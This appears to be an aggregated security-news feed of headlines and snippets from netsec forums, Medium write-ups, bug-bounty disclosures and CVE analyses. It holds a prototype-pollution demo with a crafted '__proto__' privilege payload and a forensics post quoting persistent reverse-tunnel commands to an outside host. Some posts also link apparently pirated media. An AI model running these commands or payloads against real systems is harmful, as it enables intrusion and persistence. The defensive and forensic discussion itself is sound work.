    I’ve noticed something interesting about the UITextInputContextIdentifiers.plist file (pulled from an encrypted iOS backup) - in some cases it identifies a Signal contact by phone number, whereas others are only listed by a UID … anyone else aware of the following?
    Can someone please explain to me UITextInputContextIdentifiers.plist? It seems to identify some contacts by phone number but others by a UID code. I'm trying to get my head around the UITextInputContextIdentifiers.plist file and the way in which it identifies contacts. As you're probably all aware, it's a common file (certainly on iOS) to WhatsApp, Signal, iMessenger etc., which lists the users that a communications app interacts with. I've noticed however that there are some differences between different apps and files and the times and dates that I view these files on one of my "daily drivers" that gets regular use. Some UIDs are random like this: ID_CK_40a10d98edf9f302ad15daac98bf2da665ab8 Some UIDs are directly identifiable by the contact phone number (obviously I'm just usin…

    AWS's Log4Shell HotPatch Vulnerable to Container Escape and Privilege Escalation
    submitted by /u/YuvalAvra
    US Govt Cloud Security Needs ("SCuBA"): including Technical Reference Architecture and Extensible Visibility Reference Framework (eVRF) Guidebook links
    submitted by /u/ScottContini
    Shielder - Printing Fake Fiscal Receipts - An Italian Job p.1
    submitted by /u/smaury
    Teaching Burp a new HTTP Transport Encoding
    submitted by /u/0xdea
    Exploiting, detecting, and correcting IAM security misconfigurations
    submitted by /u/MiguelHzBz
    CVE-2022-26809 : Remote Procedure Call Runtime Vulnerability
    submitted by /u/Late_Ice_9288

    AWS Log4Shell HotPatch Introduced a Container Escape Vulnerability
    Article URL: https://unit42.paloaltonetworks.com/aws-log4shell-hot-patch-vulnerabilities/ Comments URL: https://news.ycombinator.com/item?id=31090332 Points: 8 # Comments: 1

    AWS's Log4Shell Hot Patch Vulnerable to Container Escape and Privilege Escalation
    We identified severe security issues within AWS Log4Shell hot patch solutions. We provide a root cause analysis and overview of fixes and mitigations. The post AWS's Log4Shell Hot Patch Vulnerable to Container Escape and Privilege Escalation appeared first on Unit42.

    Black Box Test on eCPTXv2 exam
    Hi folks, just as I promised, I am sharing my review on eLearnSecurity’s eCPTX exam from an exam taker without purchasing course material… Continue reading on Medium »

    Poodle and Doodle, FUD and the Sucuri WAF
    On any given day, Sucuri sees thousands of clients go through the PCI compliance process. The requirements outlined by the Payment Card Industry Data Security Standard (PCI DSS) are mandatory for any website accepting credit card payments, and this process can be very stressful for website owners not familiar with these guidelines. Failure to comply with PCI requirements could result in penalties, large fines, or even losing the ability to take online credit card payments. Continue reading Poodle and Doodle, FUD and the Sucuri WAF at Sucuri Blog.

    April 2022 Git Vulnerability (CVE-2022-24765) Explained
    Article URL: https://www.youtube.com/watch?v=3Kct--wJARc Comments URL: https://news.ycombinator.com/item?id=31087896 Points: 1 # Comments: 0

    GRC Tool that Primarily Focuses on Managing Security Controls
    Hi all. I'd like to ask for a recommendation on which GRC tool to use for an organization. The focus is all about managing security controls (e.g. can the control relate to other policies or other controls, be tagged). Ideally, I'd like to import existing security controls without much manual input if possible, and the GRC tool would be a superior option over managing security controls in Excel; the GRC tool makes the management of control data easier than the status quo. I've currently dived into eramba GRC so far, but I'm afraid that, given the sophistication of all of the features, the onboarding and learning curve is a bit high. In addition, it does not seem to check off all of the user-friendly requirements needed in order to have security controls implemented, managed, and audited. My question is: are there any other GRC tools (focused on the management of security controls) that you'd recommend in order to fulfill these points? An on-prem solution would be nice, and cost isn't a huge issue. submitted by /u/SimplyMoxie
    Entry Level Net Sec Career Advice
    Hello, I'm about to graduate with a computer science degree in a few weeks. I've been doing a lot of self-teaching using THM and HTB, but I have no formal technical experience other than my degree and a web development internship. My end goal is to become a penetration tester/red teamer, but I have quite a bit to learn before I get there. I'm planning on applying to junior cyber positions in my area, but I've heard it's extremely difficult getting into an entry-level position out of college. I was hoping for some insight about what kind of path I should take. Should I go for IT roles before applying to entry-level cyber? Should I get Security+ or some other certification before applying? There's a lot of information out there and a lot of options; I just want to make sure that I'm making a smart decision. Thanks! submitted by /u/Lethal_Injections
    Trying to start a career in Cyber Security.
    I was looking into switching to cyber security and the NYU Cyber Security Bootcamp keeps popping up. It says it's from NYU Professional Studies and they don't accept educational loans, which is kind of odd. Has anyone tried their program? And is it legitimate? Seems a lil sus that a university won't take educational loans. submitted by /u/amatsuastray

    A Detailed Guide on HTML Smuggling
    Introduction: HTML Smuggling is an evasive payload delivery method that helps an attacker smuggle a payload past content filters and firewalls by hiding malicious payloads inside… The post A Detailed Guide on HTML Smuggling appeared first on Hacking Articles.

    $1000: How I could have Hack any account and become a billionaire overnightTop Crypto-Trading….
    After several emails with the security team [ which also includes depression & demotivat] and the HITCON team, the company Continue reading on InfoSec Write-ups »
    My Pentest Log -15- (HTML Injection in Wordpress)
    Greetings Everyone from Thrakion, Continue reading on Medium »
    Bug Bounty Tip 01
    Hello all, today will see one basic bug bounty tip or bug : Continue reading on Medium »
    Account Takeover By Password Reset Function.
    Hi, this is Roshan Bhalerav (RBspider). How are you all? I hope you are doing great work and making good money. So today I will discuss my last… Continue reading on Medium »

    War in Ukraine / April 18
    The Molfar team sends a daily newsletter about the war in Ukraine. Continue reading on Medium »
    Finding Elliot From Mr.Robot
    The other day I talked about the importance of props or objects around a target. But is that a viable option all the time? Let’s see! Continue reading on Medium »

    LNK (Ab)use
    I've discussed LNK files a number of times in this blog, and to be honest, I really don't think that this is a subject that gets the attention it deserves. In my experience, and I humbly bow to collection bias here, LNK files are not as well understood as they (sh|c)ould be in the DFIR and CTI fields, which puts defenders at a disadvantage. When I suggest that LNK files aren't really well understood by DFIR and CTI teams, I'm basing that on my own experience with multiple such teams over the years, largely the result of direct interaction. Why is that? Well, the LNK file format is well documented at the MS site, and there have been a number of tools written over the years for parsing these files. I've even gone so far as to create the smallest functioning LNK file, based on the minimum fun…

    Need help to Exploit Instagram.
    Can someone find a way to react to a message in DM with text (instead of an emoji) and tell me how to do it? Using Chrome on a laptop. Pleaseeeeeeeeeeee... help. #code #exploit submitted by /u/Old-Imagination8499

    SecWiki News 2022-04-19 Review
    The fragmentation of cybercrime patterns and the systematization of criminal governance by ourren; An analysis of the various ways to exploit SSRF by ourren; Analysis report on the "Hive" malicious code attack and control weapon platform by ourren; Design approach for the Digital China Internet-of-Vehicles challenge by ourren; How machine learning enables binary code similarity analysis by ourren; TP-Link WDR-7660 security research: building a serial-port CMD-based debugger by ourren; Go template meets YAML deserialization: analysis of CVE-2022-21701 by ourren; Is community-collaborative threat intelligence actually useful? by Avenger. For more of the latest articles, visit SecWiki

    Invitation Email is resent as a Reminder after invalidating pending email invites
    Mattermost disclosed a bug submitted by mr_anksec: https://hackerone.com/reports/1486820 - Bounty: $150
    xss on [developers.mtn.com]
    MTN Group disclosed a bug submitted by pisarenko: https://hackerone.com/reports/924851

    Resolving System Service Numbers using the Exception Directory - @MDSecLabs
    submitted by /u/dmchell

    Book giveaway | Still looking for a pentesting bible? This book is enough!
    Is there a scientific, step-by-step "hacker's handbook" that combines theory with practice?
    $655,000 vanishes: hackers obtain MetaMask seed phrases from iCloud backups
    Recently, the MetaMask app issued a warning to its iOS users.
    Newly discovered zero-click iPhone exploit used by NSO spyware
    Digital threat researchers at Citizen Lab have discovered a new zero-click iMessage exploit.
    New dark web marketplace Industrial Spy is selling data
    A dark web marketplace called Industrial Spy has recently been unusually active, selling, or giving away for free, data stolen from companies.
    Beanstalk loses $180 million in attack; attacker donates $250,000 to Ukraine
    The Ethereum-based stablecoin protocol Beanstalk Farms was hit by a flash-loan attack; the team subsequently acknowledged the attack and announced a halt to all interaction with the contracts.
    Fake upgrade sites are back: Windows 11 has become a favorite lure for malware
    Hackers are using Windows 11 upgrades to spread new malware that steals victims' browser data and even cryptocurrency wallets.
    Unrelenting: Anonymous continues its attacks on Russia
    Recently, the well-known international hacker collective Anonymous, together with other hacker groups, launched a new round of attacks against Russian government agencies and organizations.

    Vaf Cross-platform Advanced Web Fuzzer
    Continue reading on Medium »

    Cisco Wireless LAN Controller Interface Authentication Bypass Vulnerability
    Article URL: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-wlc-auth-bypass-JRNhV4fF Comments URL: https://news.ycombinator.com/item?id=31078246 Points: 2 # Comments: 0
    Arbitrary file write vulnerability in GNU gzip's zgrep utility
    Article URL: https://access.redhat.com/security/cve/cve-2022-1271 Comments URL: https://news.ycombinator.com/item?id=31076009 Points: 97 # Comments: 37

    Video demonstrating Office VSTO payload delivery (great replacement for macros :) )
    submitted by /u/an0n_r0
    Red Team Infrastructure
    Hi everyone, it’s been a while since I’ve posted, but it's been a wild ride on red team stuff for a while. I wanted to share another part of Red Team Notes that I’ve been working on to help beginners, as always! Trying to jump onto this category of hacking; as always, enjoy! Please reach out if there are any errors! https://dmcxblue.gitbook.io/red-team-notes-2-0/red-team-infrastructure/red-team-infrastructure submitted by /u/Dmcxblue

    MITRE Engenuity ATT&CK results are out
    submitted by /u/DanielWalker12

    LUKS encryption
    Reaching out for some help. I’m not familiar at all with Linux. I have an HDD that was ATA password protected. I was able to take it to our state police and they removed it with their Atola. I imaged the drive and found that it’s encrypted with LUKS. I have no memory image, as the computer was dropped off at our PD by a reporting party. How/can you get past the LUKS encryption? It’s currently running through Passware as I type this. The case involves CSAM. submitted by /u/HorseAdministrative7
    Research sources for low level forensics?
    So I was working on a challenge last week: an image was taken from an iPhone SIM, and using only a hex editor we needed to find unidentifiable information (location, phone number, carrier), and some random information was removed and we needed to identify what data was missing. I attempted to research on Google but it is almost all casual questions about recovering phone data. I attempted Stack Overflow and Reddit but neither seemed to have any information on the subject. What are some terms or sources I could have used to research this process? What is the Stack Overflow for forensic professionals? (By the way, I did not win the challenge.) submitted by /u/CoreRun

    Stored XSS To Other Users Via Messages
    Welcome back, I hope everyone had a good bank holiday Easter. Continue reading on System Weakness »
    Broken Authentication Login With Google
    Hello Guys! Continue reading on Medium »
    Grow With Us
    Bug Zero is striving to share knowledge among the people and we are keen to promote your voice through our medium. Continue reading on Bug Zero »
    How I got My first Disclosed XSS
    Intro : Continue reading on Medium »
    Hacking the University in a Few Steps
    Escalating a Wrong Date to Get Code Execution Continue reading on Medium »
    Hack Wi-Fi Using Aircrack-ng
    Hello everyone! In this article I tell you how to hack and crack Wi-Fi passwords using aircrack-ng, which is a terminal-based tool. Continue reading on Medium »

    What's the name of the subject I'm trying to learn about?
    So I'm working my way through the TryHackMe penetration tester course and I'm finding myself lacking a fundamental understanding of things like requests (GET/POST/etc.) and things that I would need to understand before being able to know what anything is in Burp Suite, and I'm having a hard time figuring out what the topic is called that I need to learn more about. For example, I'm feeling stuck on PHP file inclusion attacks because I don't understand what requests actually are, or if there is anything besides GET and POST. Do I just need to learn how PHP works, or is there a broader subject that would include that? submitted by /u/GrassyNotes
    How can one prepare for Attack/Defense CTF's?
    Hey AskNetsec, I'm curious about attack/defense CTFs. They seem really exciting but I'm not sure how exactly to prepare for one (because it sometimes involves exploiting services that were made specifically for the competition). What skills do attack/defense CTFs train? How can one best prepare for them? Full disclosure, I'm working on a little YT video on attack/defense CTFs for my "Learn with Intern" series, so this post will help inform that. Here is an example: https://www.youtube.com/watch?v=OVEnPi__I_8 TL;DR: What skills do attack/defense CTFs train? How can one best prepare for them? submitted by /u/NSP781
    Aspiring Junior Penetration Tester Question/Tips
    Hello Reddit community. I am an aspiring junior pen tester. I passed the eJPT exam back in November, and I am trying to gain some knowledge towards penetration testing through certifications and TryHackMe/HTB. Right now, I have around $500 to invest in a certification. My question is the following: after the eJPT that I already passed, should I go for eCPPTv2, CRTP (to gain AD knowledge) or PNPT? I know that many of you will insist that I go for the OSCP, but right now I cannot afford it. What would be the best next step? Thank you very much in advance. submitted by /u/apostonikos

    An attacker can archive and unarchive any structured scope object on HackerOne
    HackerOne disclosed a bug submitted by ahacker1: https://hackerone.com/reports/1501611 - Bounty: $12500
    SSRF occurrence in website preview used by LINE Official Account Manager (https://manager.line.biz)
    LINE disclosed a bug submitted by jafarakhondali: https://hackerone.com/reports/1131608 - Bounty: $100
    Deleting someone else's profile image with a GraphQL query in programming education service (https://entry.line.me)
    LINE disclosed a bug submitted by tosun: https://hackerone.com/reports/952095 - Bounty: $600
    Use of unreleased features in programming education service (https://entry.line.me)
    LINE disclosed a bug submitted by tosun: https://hackerone.com/reports/975428 - Bounty: $100
    SSRF restricted to HTTP/HTML on LINE Social Plugins (https://social-plugins.line.me/)
    LINE disclosed a bug submitted by duahaubadao: https://hackerone.com/reports/860939 - Bounty: $1350

    War in Ukraine / April 17
    The Molfar team sends a daily newsletter about the war in Ukraine. Continue reading on Medium »
    TAMU CTF 2022 Writeup — OSINT: Gilberto’s Brother
    This challenge provides little other than the screenshot seen below and the directive to find birth dates for both Gilberto and his unnamed… Continue reading on Medium »
    4 services for monitoring weather conditions
    Top services for collecting meteorological information, observing atmospheric phenomena and forecasting the weather. Online climate and weather maps. Continue reading on KR. LABORATORIES IT BLOG »
    Best Chrome extensions for OSINT!
    Let’s try to turn the standard CHROME browser into a full-fledged OSINT explorer tool. Continue reading on Medium »
    Kidnapping of civilians: Russia’s war of intimidation
    The Russian occupation deliberately kidnapped civilians, journalists and politicians in order to break down the Ukrainian resistance in… Continue reading on Medium »

    SecWiki News 2022-04-18 Review
    SecWiki Weekly (Issue 424) by ourren. For more of the latest articles, visit SecWiki

    Windows Red Team Cheat Sheet
    Windows for Red Teamers Continue reading on Medium »

    CVE-2022-21907 Microsoft HTTP Protocol Stack DoS PoC
    Article URL: https://github.com/polakow/CVE-2022-21907 Comments URL: https://news.ycombinator.com/item?id=31072275 Points: 3 # Comments: 0

    Prototype Pollution
    🔍 Introduction: Prototype Pollution refers to a security problem in JavaScript processing logic that arises when the prototype of Objects can be modified. If an Object's prototype can be changed, the intended logic can be bypassed, or the DOM can be affected to cause additional problems such as XSS.
        let myObj = {}
        myObj['__proto__']['a'] = 'a'   // writes property a onto myObj's prototype (__proto__), i.e. Object.prototype
        console.log(myObj.a)            // 'a'
        let newObj = {}                 // a new Object created afterwards...
        console.log(newObj.a)           // ...also logs 'a', inherited from the polluted prototype
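The snippet above writes to the prototype directly. In real applications the same write is reached indirectly, most often through a recursive "deep merge" of attacker-controlled JSON, because JSON.parse turns a literal "__proto__" key into an ordinary own property that a naive merge will happily walk into. The following is an added example, not code from the original post, showing that vulnerable merge beside a hardened one and driving both with a constructed payload; it assumes Node.js and cleans up the prototype after each run so the pollution does not leak into the rest of the process.

```javascript
// Added example (not from the original post): the same pollution reached through
// a recursive "deep merge" of attacker-controlled JSON, which is how it usually
// shows up in real applications, shown beside a hardened merge. Assumptions: Node.js
// (any recent version); the payload and the settings object are constructed here.

function isPlainObject(v) {
  return v !== null && typeof v === 'object' && !Array.isArray(v);
}

// Vulnerable: copies every key the source carries, including a literal
// "__proto__" key, which JSON.parse creates as an ordinary own property.
// target["__proto__"] then resolves to Object.prototype and gets written into.
function unsafeMerge(target, source) {
  for (const key of Object.keys(source)) {
    const value = source[key];
    if (isPlainObject(value)) {
      if (!isPlainObject(target[key])) target[key] = {};
      unsafeMerge(target[key], value);
    } else {
      target[key] = value;
    }
  }
  return target;
}

// Hardened: refuses the keys that reach a prototype and never recurses into a
// value the target merely inherits.
const BLOCKED_KEYS = new Set(['__proto__', 'constructor', 'prototype']);

function safeMerge(target, source) {
  for (const key of Object.keys(source)) {
    if (BLOCKED_KEYS.has(key)) continue;
    const value = source[key];
    if (isPlainObject(value)) {
      if (!Object.prototype.hasOwnProperty.call(target, key) || !isPlainObject(target[key])) {
        target[key] = {};
      }
      safeMerge(target[key], value);
    } else {
      target[key] = value;
    }
  }
  return target;
}

// Constructed attacker input, e.g. the body of an "update my profile" request.
const ATTACKER_JSON = '{"profile":{"name":"alice"},"__proto__":{"isAdmin":true}}';

// Merge the payload into a fresh settings object with the given merge function
// and report whether an unrelated object now inherits isAdmin. Cleans the
// prototype afterwards so the pollution does not leak into the rest of the process.
function demo(mergeFn) {
  const settings = {};
  mergeFn(settings, JSON.parse(ATTACKER_JSON));
  const bystander = {};
  const polluted = bystander.isAdmin === true;
  delete Object.prototype.isAdmin;
  return { name: settings.profile.name, polluted };
}

console.log('unsafeMerge:', demo(unsafeMerge)); // polluted: true
console.log('safeMerge:  ', demo(safeMerge));   // polluted: false
```

Blocking the three key names closes the common path, but the stronger fix is structural: build objects that hold untrusted data with `Object.create(null)` (no prototype to reach) or freeze `Object.prototype` at startup, and make authorization checks test own properties rather than inherited ones.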
  • Open

    How Mobile Operators should Thousands of Dollars because of SMS Malware.
    No content preview
  • Open

    FreeBuf Morning Report | GitHub blocks the accounts of two large Russian banks; a financial platform vulnerability could leak bank information
    As part of the US sanctions, GitHub has begun suspending the accounts of users registered in Russia and blocking the accounts of Russian financial institutions.
    A new wave of DDoS attacks: analysis of TCP reflective amplification attacks that abuse middleboxes
    Attackers can exploit flaws in how some network middleboxes identify TCP sessions to carry out an entirely new kind of DDoS reflective amplification attack.
    GitHub bans some Russian developer accounts
    GitHub has started blocking the accounts of Russian developers at companies under US sanctions.
    $540 million stolen in a single month: the Lazarus Group hackers use the money to build missiles
    The US Treasury has accused the Lazarus Group of stealing $540 million in March from Ronin Network, the Axie Infinity sidechain.
    The Conti ransomware group claims responsibility for the ransomware attack on Nordex
    German wind turbine manufacturer Nordex recently published a statement on its website saying it had suffered a cyberattack.
    GitHub: stolen OAuth tokens used to exfiltrate data from dozens of organizations
    On April 15 GitHub disclosed that attackers are using stolen OAuth user tokens to download data from private repositories.
    How enterprises can build a "zero-cost" security program | FreeBuf enterprise community livestream recap
    On the evening of April 14, the FreeBuf enterprise community held its first internal livestream, in which Fan Zhengyi, head of information security at OPPLE Lighting Group, shared how an enterprise can build a "zero-cost" security program.
    Starting from "zero" to rebuild trust | Call for topics opens for the CIS Zero Trust Security Forum
    For this forum FreeBuf has invited many leading cybersecurity figures to bring attendees more comprehensive and valuable presentations.
  • Open

    CVE-2022-22954 VMware Workspace ONE Access Server-Side Template Injection RCE
    Author: Y4er. Original link: https://y4er.com/post/cve-2022-22954-vmware-workspace-one-access-server-side-template-injection-rce/ Setting up the environment: the image identity-manager-21.08.0.1-19010796_OVF10.ova provided by r师; when importing the OVA you need to set the FQDN, otherwise during installation the connection...
    Notes on pitfalls when injecting a Behinder (冰蝎) memory shell via Java deserialization
    Author: Y4er. Original link: https://y4er.com/post/java-deserialization-inject-behinder-memshell-note/ A friend asked me to help inject a memory shell, using the CB chain with no CC dependency. I figured this was trivial, but then I ran into countless pitfalls. Reworking the CB chain to remove the CC dependency: p牛 has already covered this, so without further ado, here is the code: public Object getObject(...
    When Go template meets YAML deserialization: analysis of CVE-2022-21701
    Author: lazydog. Original link: http://noahblog.360.cn/go-template-meets-yaml-cve-2022-21701/ Preface: this article analyzes CVE-2022-21701, an Istio privilege escalation vulnerability, and explains the flaw that results when Go template is combined with YAML deserialization; it resembles "template injection" but does not rely solely on the template engine's features, instead arising from the combination with YAML parsing...
  • Open

    In-depth analysis of the CVE-2022-21882 Win32k kernel privilege escalation vulnerability
    1. Vulnerability overview 2. Affected versions 3. Analysis environment 4. Background 5. Root cause 6. Exploitation flow 6.1 Triggering the user-mode callback 6.2 Hooking the callback function 6.3 Changing the window mode to mode 1 6.4 Returning a forged offset from the callback 6.5 Leaking the kernel window data structure 6.6 Laying out memory 7. Analyzing and debugging the exploit 8. Two privilege escalation methods 8.1 Setting the token 8.2 Modifying Privileges 9. Patch analysis 10. References. CVE-2022-21882 is a local privilege escalation vulnerability in Windows that Microsoft patched in the January 2022 security update. This article analyzes the root cause and the exploit program in detail. 1 Vulnerability overview CVE-2022-21882 is a bypass of CVE-2021-1732 and is a type confusion vulnerability in the win32k driver. An attacker can call related GUI APIs from user mode to enter the kernel, such as xxxMenuWindowProc, xxxSBWndProc, xxxSwitchWndProc and xxxTooltipWndProc; these kernel functions trigger the xxxClientAllocWindowClassExtraBytes callback. By hooking xxxClientAllocWindowClassExtraBytes in the KernelCallbackTable the attacker can intercept that callback and use NtUserConsoleControl to set the ConsoleWindow flag on the tagWNDK object, thereby changing the window type. After the callback returns, the system does not check whether the window type has changed and, because of the type confusion, references the wrong data. The difference before and after the flag is set is that before the flag is set the system treats tagWNDK.pE…

  • Open

    Windows Persistence: Registry Run Keys
    After getting a foothold on a target, the next goal should be to persist on that target. If no persistence method is utilized, then the… Continue reading on Medium »
    CrowSec EdTech Write-Up: Hijacking
    This article is about the CTF (Capture The Flag) called “Hijacking”, where I learned much about new techniques of privilege escalation… Continue reading on Medium »
    The Story of A Simple SentinelOne Hash Blacklist Bypass
    (Originally Posted on 2021–06–02) Continue reading on Medium »
  • Open

    Caught some kind of DNS server running in a local IP. Virus? Spyware?
    Hi everyone, I caught some apps unrelated to each other trying to connect to 10.0.0.241. My local LAN is in the 192.168.x.x range, so there should be nothing in 10.0.0. Investigated and apparently there's a DNS server I knew nothing about running locally. WTF is this mofo, how do I kill it, is this a sign of some kind of infection? I did an nmap and it showed this:
    Starting Nmap 7.92 ( https://nmap.org ) at (date and time)
    Nmap scan report for 10.0.0.241
    Host is up (0.029s latency).
    Not shown: 994 closed tcp ports (conn-refused)
    PORT     STATE    SERVICE
    53/tcp   open     domain
    389/tcp  filtered ldap
    636/tcp  filtered ldapssl
    1099/tcp filtered rmiregistry
    3268/tcp filtered globalcatLDAP
    3269/tcp filtered globalcatLDAPssl
    Nmap done: 1 IP address (1 host up) scanned in 23.27 seconds
    Then I did a traceroute and saw this:
    traceroute to 10.0.0.241 (10.0.0.241), 64 hops max, 52 byte packets
     1  * 10.28.18.1 (10.28.18.1)  33.628 ms  27.414 ms
     2  2a28115c3952 (10.0.0.241)  27.610 ms  27.397 ms  31.312 ms
    submitted by /u/my_humble_chapeau [link] [comments]
    I'm new to Incident Response. Any Tips?
    Hey there, I'm starting to be more involved in our newly formed Incident Response Team. Basically a group of individuals discussing the further operations after a vuln appears. Do you guys have any tips? submitted by /u/No_Bumblebee_5793 [link] [comments]
    My online school is having some kind of cyber attacks on our Zoom classes
    I'm running an online school with some paid and unpaid students overseas, including China, and we recently started having attacks that make the Zoom meeting software behave in unusual ways and crash. After I turned off my router (this resets the local IP) the attacks stopped for a few minutes, but then resumed. Today, after my PC was off for a long period of time, as soon as I started a Zoom meeting the program lagged/glitched and crashed, and I had to cancel the meeting. I fired up a VPN immediately and restarted; this fixed the problem. My thinking is that if I connect to a specific student's computer, where the issue is coming from overseas, the attacks will start again, and could they maybe even cause us a problem by getting around the VPN? I’m just one person running a very small bu…
    If Facebook is selling your information
    Then where can I buy it? submitted by /u/zethara [link] [comments]
  • Open

    TryHackMe writeup: Bebop
    No content preview
    THM Writeup: VulnNet Roasted
    No content preview
    Devzat from HackTheBox — Detailed Walkthrough
    No content preview
    Tech_Supp0rt: 1 (Tryhackme)
    No content preview
  • Open

    Ti West’s “X”: an Overrated Throwback
    A work of art or entertainment can have a lot on its mind and under its hood, but if you don’t like it, you don’t like it, and no amount… Continue reading on Fanfare »
    X: The slasher gives horror fans what they want
    A24's new film is a fun slasher and an ambitious project that respects the genre's dogmas and plays with caricatures of the industry of… Continue reading on Medium »
  • Open

    THCon CTF Writeup - SHA-1 exploitation, PHP LFI and RCE
    submitted by /u/GuyLewin [link] [comments]
    Semgrep rules for smart contracts based on DeFi exploits
    submitted by /u/iterablewords [link] [comments]
    Packets Remystified: Broadcast Brujería
    submitted by /u/0xdea [link] [comments]
    Spock SLAF is a Shared Library for Application Firewall "SLAF". It has the purpose to protect any service that uses the OpenSSL library. The SLAF inserts hooking to intercept all communication to detect security anomalies and block and log attacks.
    submitted by /u/CoolerVoid [link] [comments]
  • Open

    Web Attack Cheat Sheet
    Discovering Continue reading on Medium »
    Knock Subdomain Scan
    Knock Subdomain Scan v5.3.0 Continue reading on Medium »
    Open Redirection & Broken Link Hijacking
    Let us learn about Open Redirection & Broken Link Hijacking Continue reading on Medium »
    SQL Injection in Harvard’s Subdomain
    Hi there! I’m Bibek Neupane from Nepal. In this first-ever write-up of mine, I’ll try to cover my story of finding a SQL Injection on… Continue reading on Pentester Nepal »
  • Open

    War in Ukraine / April 16
    The Molfar team sends a daily newsletter about the war in Ukraine. Continue reading on Medium »
    Where’s Trump?
    Pin Pointing Trump Continue reading on Medium »
    Geo Location From Mr.Robot
    Where’s Elliot? Continue reading on Medium »
    Identification of the owner of Google Docs
    Today we will study the possibility of identifying the owner of Google documents. In the simplest version, you just need to open the file… Continue reading on Medium »
  • Open

    Leveldb File Forensics
    I want to examine the push notifications in a .ldb file. I know I can see the notifications, after some parsing, through a hex editor, but thought there has to be a better way. Does anyone know of a tool to allow me to view/dump the key values for an .ldb file? There's a great writeup from GIAC on how .ldb files work: https://www.giac.org/paper/gcih/20579/google-chrome-notification-analysis-in-depth/128522 But no mention of how to parse the information. I've tried a few GitHub tools without success: https://github.com/google/leveldb -- successfully compiled the tool. This tool seemed the most promising. I tried using the command: ./leveldbutil dump [filename].ldb but received the following error: Corruption: corrupted compressed block contents I don't think the file is corrupted, because when I view the contents in a hex editor, I can read the key-values from the Push Notifications. https://github.com/SuperMarcus/LevelDBViewer/releases - couldn't open the file. https://github.com/markmckinnon/Leveldb-py - couldn't open the file. Any suggestions? edit: Just tried a Python package called Plyvel: https://plyvel.readthedocs.io/en/latest/
    >>> import plyvel
    >>> db = plyvel.DB("006264.ldb", compression=None)
    Traceback (most recent call last):
      File "", line 1, in
      File "plyvel/_plyvel.pyx", line 247, in plyvel._plyvel.DB.__init__
      File "plyvel/_plyvel.pyx", line 88, in plyvel._plyvel.raise_for_status
    plyvel._plyvel.IOError: b'IO error: 006264.ldb/LOCK: Not a directory'
    >>>
    submitted by /u/Praxxer1 [link] [comments]
  • Open

    SecWiki News 2022-04-17 Review
    No news updated yet today~ For more recent articles, visit SecWiki
  • Open

    [Cullinan #32] Add SSE and Kiterunner!
    This is Cullinan log #32. The SSE and Kiterunner pages were newly added, and the threat modeling, ssti, xss, ssrf and oast pages were updated. New: Add SSE(Server-Sent Events); Add Kiterunner. Update: Add resource to cullinan > threat modeling; Add tools to cullinan > ssti; Add short xss to cullinan > xss; Add combined xss to cullinan > xss; Add bypass with 20x to cullinan > ssrf; Add bypass with toctou to cullinan > ssrf; Add dns pinning to cullinan > ssrf; Add bypass with ffmpeg to cullinan > ssrf; Add bypass techniques to cullinan > oast. And once the data is somewhat organized, the blog's tag(e.
  • Open

    Some movies (not all checked so NSFW) WARNING VERY SLOW
    There are several movies in the movie folder, arranged quite weirdly. https://dl3.3rver.org/hex1/ I do not know what is in the other folders submitted by /u/NursingGrimTown [link] [comments]
    Went looking for Moon Knight comics.
    I know at least 1 is a repost. https://archives.eyrie.org/anime/ https://www.greenlittleapple.com/ln/ This one was a bit iffy - it is up and down for me. https://booksdl.org/comics0/_0DAY/0-Day%20Week%20of%202019.09.11/ submitted by /u/ringofyre [link] [comments]
    English & Intl movies, animation, PC games, other stuff
    http://103.152.18.18/Data Kind of slow but functional. submitted by /u/rippleredial [link] [comments]
  • Open

    Cracking Kubernetes RBAC Authorization Model
    This post first appeared as Limiting access to Kubernetes resources with RBAC, which was kindly edited, re-illustrated and exemplified by learnk8s.io, and very friendly to beginners. The version posted here in contrast has a biased focus on the design and implementation, as well as in-depth discussions. TL; DR This post digs into the Kubernetes RBAC authorization (AuthZ) model. Specifically, given technical requirements of granting proper permissions to an application to access kube-apiserver, we’ll introduce concepts like User, ServiceAccount, Subject, Resource, Verb, APIGroup, Rule, Role, RoleBinding etc step by step, and eventually build a RBAC authorization model by our own. Hope that after reading this post, readers will have a deeper understanding on the access control (AuthZ) of kub…

  • Open

    Threat Actor Profile - ALPHV
    submitted by /u/RandyMarsh_Lorde [link] [comments]
  • Open

    business.amazon.com Has a HUGE VULNERABILITY that allows attackers to send emails
    Hi everyone. I made a post about a weird spoof email I received from business.amazon.com that may hint at a possible vulnerability pertaining to the DNS records for business.amazon.com. Post I think someone figured out what is going on with this comment. I got the attention of AmazonHelp over at Twitter (Link To AmazonHelp's comment) Update: Here are some screenshots of how the conversation is going over at Twitter (https://imgur.com/a/ggZSVyk) submitted by /u/possiblyahermit [link] [comments]
    Understanding Port Forwarding Commands
    Hi all, I'm doing some forensics at the moment (...school environment). I just wanted to get some feedback on my interpretation of these commands. I don't have a lot of experience with bouncing traffic around.
    nohup ./wstunnel -L 8888:localhost:22 ws://w.x.y.z:80 &
    sleep 2
    nohup ssh -o "StrictHostKeyChecking no" -R 2222:localhost:22 -p 8888 -N kali@localhost &
    First line: No hang-up (persist), start a websocket tunnel that binds to port 8888 on localhost, and forwards to port 22 (moving the communication over SSH). The tunnel destination is w.x.y.z:80, and the command is backgrounded. Last line: No hang-up (persist), and specify that connections to port 2222 on localhost should be forwarded to port 22. Do not execute a remote command (-N) and connect via SSH to kali@localhost (which is a remote attacker, I think. Not sure why it is called "localhost"), and background the command. It's definitely a bit confusing for me to parse. Am I off the mark? submitted by /u/InfamousClyde [link] [comments]
    How do you organise your knowledge on long engagements?
    For CTFs, I use cherrytree for notes, but it doesn't scale to a group. At the company, we use text files (markup) in folders, and regular files in folders. And do a full text index on the whole mess. (Of course some stuff, like bloodhound data, can't be easily indexed) And we can't even agree on folder names. Sometimes you know the host name of a box, sometimes only the IP. Boxes have more than one IP. The same windows box may get a different IP the next day via DHCP. The company may have two 192.168.1.X subnets, that just don't route to each other. (We had a look at dradis & pentest.ws and found them too restrictive/opinionated, but maybe we have to give them another try) - How do you organise your knowledge? - Any workflows or tools that work well? Thanks! submitted by /u/MOVSQ [link] [comments]
    Is Network+ and web penetration testing enough to land an entry job as a penetration tester?
